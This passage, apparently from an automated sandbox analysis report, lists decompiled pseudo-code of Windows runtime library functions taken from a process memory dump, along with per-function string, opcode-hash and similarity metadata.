                                                                                                                							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                                                                                							 *(_t132 + 0x10) = _t146;
                                                                                                                							asm("bsf eax, [esp+0x18]");
                                                                                                                							_v52 = _t100;
                                                                                                                							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                                                                                							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                                                                                							_t47 =  &_a8;
                                                                                                                							 *_t47 = _a8 & 0x00000001;
                                                                                                                							if( *_t47 == 0) {
                                                                                                                								E01212280(_t179 + 0x30, _t179 + 0x30);
                                                                                                                							}
                                                                                                                							_t147 =  *(_t179 + 0x34);
                                                                                                                							_t159 =  *(_t179 + 0x38) & 1;
                                                                                                                							_v68 = 0;
                                                                                                                							if(_t147 == 0) {
                                                                                                                								L35:
                                                                                                                								E0120B090(_t179 + 0x34, _t147, _v68, _t132);
                                                                                                                								if(_a8 == 0) {
                                                                                                                									E0120FFB0(_t132, _t177, _t179 + 0x30);
                                                                                                                								}
                                                                                                                								asm("lock xadd [eax], ecx");
                                                                                                                								asm("lock xadd [eax], edx");
                                                                                                                								_t132 = 0;
                                                                                                                								_v72 = _v72 & 0;
                                                                                                                								_v68 = _v72;
                                                                                                                								if(E01217D50() == 0) {
                                                                                                                									_t113 = 0x7ffe0388;
                                                                                                                								} else {
                                                                                                                									_t177 = _v64;
                                                                                                                									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                								}
                                                                                                                								if( *_t113 == _t132) {
                                                                                                                									_t166 = _v68;
                                                                                                                									goto L46;
                                                                                                                								} else {
                                                                                                                									_t166 = _v68;
                                                                                                                									E012AFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                                                                                									goto L12;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								L23:
                                                                                                                								while(1) {
                                                                                                                									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                                                                                										_t122 =  *_t147;
                                                                                                                										if(_t159 == 0) {
                                                                                                                											L32:
                                                                                                                											if(_t122 == 0) {
                                                                                                                												L34:
                                                                                                                												_v68 = 0;
                                                                                                                												goto L35;
                                                                                                                											}
                                                                                                                											L33:
                                                                                                                											_t147 = _t122;
                                                                                                                											continue;
                                                                                                                										}
                                                                                                                										if(_t122 == 0) {
                                                                                                                											goto L34;
                                                                                                                										}
                                                                                                                										_t122 = _t122 ^ _t147;
                                                                                                                										goto L32;
                                                                                                                									}
                                                                                                                									_t122 =  *(_t147 + 4);
                                                                                                                									if(_t159 == 0) {
                                                                                                                										L27:
                                                                                                                										if(_t122 != 0) {
                                                                                                                											goto L33;
                                                                                                                										}
                                                                                                                										L28:
                                                                                                                										_v68 = 1;
                                                                                                                										goto L35;
                                                                                                                									}
                                                                                                                									if(_t122 == 0) {
                                                                                                                										goto L28;
                                                                                                                									}
                                                                                                                									_t122 = _t122 ^ _t147;
                                                                                                                									goto L27;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_v72 = _v72 & 0x00000000;
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                			}




































                                                                                                                0x012be7c7
                                                                                                                0x012be806
                                                                                                                0x00000000
                                                                                                                0x012be7c9
                                                                                                                0x012be7d1
                                                                                                                0x012be7d8
                                                                                                                0x00000000
                                                                                                                0x012be7d8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012be722
                                                                                                                0x012be72e
                                                                                                                0x012be748
                                                                                                                0x012be74c
                                                                                                                0x012be754
                                                                                                                0x012be756
                                                                                                                0x012be75c
                                                                                                                0x012be75c
                                                                                                                0x00000000
                                                                                                                0x012be75c
                                                                                                                0x012be758
                                                                                                                0x012be758
                                                                                                                0x00000000
                                                                                                                0x012be758
                                                                                                                0x012be750
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012be752
                                                                                                                0x00000000
                                                                                                                0x012be752
                                                                                                                0x012be730
                                                                                                                0x012be735
                                                                                                                0x012be73d
                                                                                                                0x012be73f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012be741
                                                                                                                0x012be741
                                                                                                                0x00000000
                                                                                                                0x012be741
                                                                                                                0x012be739
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012be73b
                                                                                                                0x00000000
                                                                                                                0x012be73b
                                                                                                                0x012be722
                                                                                                                0x012be720
                                                                                                                0x012be6b0
                                                                                                                0x012be618
                                                                                                                0x00000000
                                                                                                                0x012be618

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `$`
                                                                                                                • API String ID: 0-197956300
                                                                                                                • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                • Instruction ID: f945207935f7855962fb97d00ed16d95dead597e0e8fe1e0e920775933f5663f
                                                                                                                • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                • Instruction Fuzzy Hash: 9491B3712243429FE724CE29C881BABBBE5FF84754F15892DF695CB281E774E804CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E012751BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				signed short* _t63;
                                                                                                                				signed int _t64;
                                                                                                                				signed int _t65;
                                                                                                                				signed int _t67;
                                                                                                                				intOrPtr _t74;
                                                                                                                				intOrPtr _t84;
                                                                                                                				intOrPtr _t88;
                                                                                                                				intOrPtr _t94;
                                                                                                                				void* _t100;
                                                                                                                				void* _t103;
                                                                                                                				intOrPtr _t105;
                                                                                                                				signed int _t106;
                                                                                                                				short* _t108;
                                                                                                                				signed int _t110;
                                                                                                                				signed int _t113;
                                                                                                                				signed int* _t115;
                                                                                                                				signed short* _t117;
                                                                                                                				void* _t118;
                                                                                                                				void* _t119;
                                                                                                                
                                                                                                                				_push(0x80);
                                                                                                                				_push(0x12d05f0);
                                                                                                                				E0124D0E8(__ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                                                                				_t115 =  *(_t118 + 0xc);
                                                                                                                				 *(_t118 - 0x7c) = _t115;
                                                                                                                				 *((char*)(_t118 - 0x65)) = 0;
                                                                                                                				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                                                				_t113 = 0;
                                                                                                                				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                                                                				_t100 = __ecx;
                                                                                                                				if(_t100 == 0) {
                                                                                                                					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                                                                					E0120EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                                					 *((char*)(_t118 - 0x65)) = 1;
                                                                                                                					_t63 =  *(_t118 - 0x90);
                                                                                                                					_t101 = _t63[2];
                                                                                                                					_t64 =  *_t63 & 0x0000ffff;
                                                                                                                					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                                                					L20:
                                                                                                                					_t65 = _t64 >> 1;
                                                                                                                					L21:
                                                                                                                					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                                                                					if(_t108 == 0) {
                                                                                                                						L27:
                                                                                                                						 *_t115 = _t65 + 1;
                                                                                                                						_t67 = 0xc0000023;
                                                                                                                						L28:
                                                                                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                                                                						L29:
                                                                                                                						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                                                                						E012753CA(0);
                                                                                                                						return E0124D130(0, _t113, _t115);
                                                                                                                					}
                                                                                                                					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                                                                						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                                                                							 *_t108 = 0;
                                                                                                                						}
                                                                                                                						goto L27;
                                                                                                                					}
                                                                                                                					 *_t115 = _t65;
                                                                                                                					_t115 = _t65 + _t65;
                                                                                                                					E0123F3E0(_t108, _t101, _t115);
                                                                                                                					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                                                                					_t67 = 0;
                                                                                                                					goto L28;
                                                                                                                				}
                                                                                                                				_t103 = _t100 - 1;
                                                                                                                				if(_t103 == 0) {
                                                                                                                					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                                                                					_t74 = E01213690(1, _t117, 0x11d1810, _t118 - 0x74);
                                                                                                                					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                                                                					_t101 = _t117[2];
                                                                                                                					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                                                					if(_t74 < 0) {
                                                                                                                						_t64 =  *_t117 & 0x0000ffff;
                                                                                                                						_t115 =  *(_t118 - 0x7c);
                                                                                                                						goto L20;
                                                                                                                					}
                                                                                                                					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                                                                					_t115 =  *(_t118 - 0x7c);
                                                                                                                					goto L21;
                                                                                                                				}
                                                                                                                				if(_t103 == 1) {
                                                                                                                					_t105 = 4;
                                                                                                                					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                                                                					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                                                                					_push(_t118 - 0x70);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push(_t105);
                                                                                                                					_push(_t118 - 0x78);
                                                                                                                					_push(0x6b);
                                                                                                                					 *((intOrPtr*)(_t118 - 0x64)) = E0123AA90();
                                                                                                                					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                                                					_t113 = L01214620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                                                                					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                                                                					if(_t113 != 0) {
                                                                                                                						_push(_t118 - 0x70);
                                                                                                                						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                                                                						_push(_t113);
                                                                                                                						_push(4);
                                                                                                                						_push(_t118 - 0x78);
                                                                                                                						_push(0x6b);
                                                                                                                						_t84 = E0123AA90();
                                                                                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                                                                						if(_t84 < 0) {
                                                                                                                							goto L29;
                                                                                                                						}
                                                                                                                						_t110 = 0;
                                                                                                                						_t106 = 0;
                                                                                                                						while(1) {
                                                                                                                							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                                                                							 *(_t118 - 0x88) = _t106;
                                                                                                                							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                                                                							_t106 = _t106 + 1;
                                                                                                                						}
                                                                                                                						_t88 = E0127500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                                                                						_t119 = _t119 + 0x1c;
                                                                                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                                                                						if(_t88 < 0) {
                                                                                                                							goto L29;
                                                                                                                						}
                                                                                                                						_t101 = _t118 - 0x3c;
                                                                                                                						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                                                                						goto L21;
                                                                                                                					}
                                                                                                                					_t67 = 0xc0000017;
                                                                                                                					goto L28;
                                                                                                                				}
                                                                                                                				_push(0);
                                                                                                                				_push(0x20);
                                                                                                                				_push(_t118 - 0x60);
                                                                                                                				_push(0x5a);
                                                                                                                				_t94 = E01239860();
                                                                                                                				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                                                                				if(_t94 < 0) {
                                                                                                                					goto L29;
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                                                                					_t101 = L"Legacy";
                                                                                                                					_push(6);
                                                                                                                				} else {
                                                                                                                					_t101 = L"UEFI";
                                                                                                                					_push(4);
                                                                                                                				}
                                                                                                                				_pop(_t65);
                                                                                                                				goto L21;
                                                                                                                			}























                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: Legacy$UEFI
                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                • Opcode ID: f0622d804e97dd562626f237e6259736bbc4da821d7059102f164b500bf72272
                                                                                                                • Instruction ID: 69d919c0a20d2cd918cf6ae8164ed3c9079195e4cc717975741b2573b57e56fa
                                                                                                                • Opcode Fuzzy Hash: f0622d804e97dd562626f237e6259736bbc4da821d7059102f164b500bf72272
                                                                                                                • Instruction Fuzzy Hash: 7D515BB1A206099FDB25DFA8C940BAEFBF8FF58700F14442DE649EB291DB719941CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0121B9A5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID:
                                                                                                                • API String ID: 885266447-0
                                                                                                                • Opcode ID: 71b84ebb722c54f7e6f5a2e9ca7221e0ed4317e46553ff65803e55fe7fad59bb
                                                                                                                • Instruction ID: fbfbec01cafe0e567d48fff8f7f8cc5d3c9a941a9e51f948cc788649b5ff18e5
                                                                                                                • Opcode Fuzzy Hash: 71b84ebb722c54f7e6f5a2e9ca7221e0ed4317e46553ff65803e55fe7fad59bb
                                                                                                                • Instruction Fuzzy Hash: AF515971A28342CFC720DF29C18092ABBF5FB98610F14896EFA8597359D771E844CF92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: _vswprintf_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 677850445-0
                                                                                                                • Opcode ID: a94cb6f2e890e56f3a05a78d1efe103ab15d3f05b220401ffb66fed7b7bb079a
                                                                                                                • Instruction ID: e4d4ba73db8dc8216598ba3441677a502b580aa6f06279942c4e79270f8d722f
                                                                                                                • Opcode Fuzzy Hash: a94cb6f2e890e56f3a05a78d1efe103ab15d3f05b220401ffb66fed7b7bb079a
                                                                                                                • Instruction Fuzzy Hash: 1851D471D2429A8BDB75EF68C8857BEFBB0AF04710F1041ADDD599B282E7704981CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PATH
                                                                                                                • API String ID: 0-1036084923
                                                                                                                • Opcode ID: beb0a3cd6ed1b535f9997bea4742c29e15f098ae3e1d696a50a6373ba2d6995b
                                                                                                                • Instruction ID: 931bee969e7c31678a90519f61ef0d35da1fbe6f0482f2630532e5110f598288
                                                                                                                • Opcode Fuzzy Hash: beb0a3cd6ed1b535f9997bea4742c29e15f098ae3e1d696a50a6373ba2d6995b
                                                                                                                • Instruction Fuzzy Hash: ADC19171E2022AEFDB25DF98D881BBDBBF5FF58740F544029E501AB250E775A841CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0126BE0F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                                                • API String ID: 0-865735534
                                                                                                                • Opcode ID: 232d9cf34c53bf447a949fc39d7cbc16a2ebec0d4202abe2df93b98e93c6a88a
                                                                                                                • Instruction ID: a685dae5de24ef8f19eab341a42d769326343d4f9ff7d553fb09678ae262e211
                                                                                                                • Opcode Fuzzy Hash: 232d9cf34c53bf447a949fc39d7cbc16a2ebec0d4202abe2df93b98e93c6a88a
                                                                                                                • Instruction Fuzzy Hash: D5A10531B20617ABEB26CB68C95477EB7B8AF48710F04456DEA46CB7D1EB70D841CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RTL: Re-Waiting
                                                                                                                • API String ID: 0-316354757
                                                                                                                • Opcode ID: 0afa939c781b589ef0dfe7ba2e761f2b50a4449062923e1228845d1ccf838594
                                                                                                                • Instruction ID: 283bcc80ef5cd3c6489b531ee333d5b0b162630758cdabc9fe37ae0d90998b5b
                                                                                                                • Opcode Fuzzy Hash: 0afa939c781b589ef0dfe7ba2e761f2b50a4449062923e1228845d1ccf838594
                                                                                                                • Instruction Fuzzy Hash: 81615531A20656AFEB3ADF6CC944B7E7BE4EB84314F250269DB11972C2C774D901C782
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `
                                                                                                                • API String ID: 0-2679148245
                                                                                                                • Opcode ID: 354073d180a72a64aaded3a4083f446e4b3760cd0a6d3cb71dc9f98313877b0a
                                                                                                                • Instruction ID: 850942310889db19d3b1fa50387a55db19f92f2bbee4a5b0b68f469028ce0700
                                                                                                                • Opcode Fuzzy Hash: 354073d180a72a64aaded3a4083f446e4b3760cd0a6d3cb71dc9f98313877b0a
                                                                                                                • Instruction Fuzzy Hash: D2519D71324342DBD325DF28D985B2BBBE5EBC4B44F040A2CFB9687291D670E845C766
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @
                                                                                                                • API String ID: 0-2766056989
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: BinaryHash
                                                                                                                • API String ID: 0-2202222882
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `
                                                                                                                • API String ID: 0-2679148245
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: BinaryName
                                                                                                                • API String ID: 0-215506332
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @
                                                                                                                • API String ID: 0-2766056989
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: WindowsExcludedProcs
                                                                                                                • API String ID: 0-3583428290
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Actx
                                                                                                                • API String ID: 0-89312691
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • Critical error detected %lx, xrefs: 012A8E21
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Critical error detected %lx
                                                                                                                • API String ID: 0-802127002
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0128FF60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                • API String ID: 0-1911121157
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ea3a9b7e6b7e6b75df8bef114bef809f3f62cb822c0239167c71ac06bd887441
                                                                                                                • Instruction ID: ddac5e99d1a055aaa5339e9b180ab802895e596f7929cbae6daa78c1efd16c69
                                                                                                                • Opcode Fuzzy Hash: ea3a9b7e6b7e6b75df8bef114bef809f3f62cb822c0239167c71ac06bd887441
                                                                                                                • Instruction Fuzzy Hash: DF711272261B02AFEB32EF18C845F66BBE5EB44721F14452CE755876E0DBB1E941CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                • Instruction ID: 43b9ffdbfa156606d4f8fd152342deac5d00415694bef975ba2efe03e20bf2fb
                                                                                                                • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                • Instruction Fuzzy Hash: 4C717C71A1061AEFDB11DFA8C984EEEBBF9FF58700F104469E505E7290DB30AA41CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 61540da4d944f79b9e802ca511e244c281fd6cee38105b683176c032c2dd14a3
                                                                                                                • Instruction ID: d8c919fed350b67ccd0ce83dd0be287874cb0aefed0ff6d9e23cc9975f4e1c24
                                                                                                                • Opcode Fuzzy Hash: 61540da4d944f79b9e802ca511e244c281fd6cee38105b683176c032c2dd14a3
                                                                                                                • Instruction Fuzzy Hash: 1951EF71125742EBD726EF28C845B2BBBE5FFA0710F140A1EF99587692E770E840C792
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bd3d8873a6daebdadbc4467517f59b096a58b3f3d03468e6b886bf3a5cb97c10
                                                                                                                • Instruction ID: b9859757cb07e32ef54319bac32af3e8855210a7f4c50f2fa60abde0543fabfb
                                                                                                                • Opcode Fuzzy Hash: bd3d8873a6daebdadbc4467517f59b096a58b3f3d03468e6b886bf3a5cb97c10
                                                                                                                • Instruction Fuzzy Hash: 1151F476B20125DFCB24CF1CC880ABDB7F5FB98700706845AE846AB355E776AA51CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a8d914f5a241e246746291618b3c95eca40b95b7f3b6726137b4bbcdfd4d19bc
                                                                                                                • Instruction ID: 5464ad017aeada4a6b8611b5569245ab2c7c695c3c00813c9a142c762bdc0e46
                                                                                                                • Opcode Fuzzy Hash: a8d914f5a241e246746291618b3c95eca40b95b7f3b6726137b4bbcdfd4d19bc
                                                                                                                • Instruction Fuzzy Hash: 3B41F4B17202129BD726CA2DC8D4BFBB79AAF947A0F044229FB56C72D0DB75D801C790
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2e5d2ebd8977116f0f5feb3ef4216e53a5572f855064af571939299ce3374d5e
                                                                                                                • Instruction ID: 13cf18825c688ea9e18aaa7756c36b62294fd6728def2454d03e35c54be0b997
                                                                                                                • Opcode Fuzzy Hash: 2e5d2ebd8977116f0f5feb3ef4216e53a5572f855064af571939299ce3374d5e
                                                                                                                • Instruction Fuzzy Hash: 0751A372A1060ADFCB15CFA8C484AAEFBF5BF68310F248559D659A7348DB70AD44CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                • Instruction ID: 42cadede849619718a36f94f3dc9cf2b813fae89f6483d4459a66d67155df265
                                                                                                                • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                • Instruction Fuzzy Hash: 1E511930E24246DFEB26CB68C1D57AEBBB2AF05314F1482ACCA55572C3D3B5A9C8C741
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                • Instruction ID: ab07adf9fbc2abd126a699d7f3c2b39e487e9dd1cbf68c3075abc0ce0f1eef0b
                                                                                                                • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                • Instruction Fuzzy Hash: 1151AD71610646EFDB16CF18D880A92BBF5FF54744F14C1AAEA089F212E371E946CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
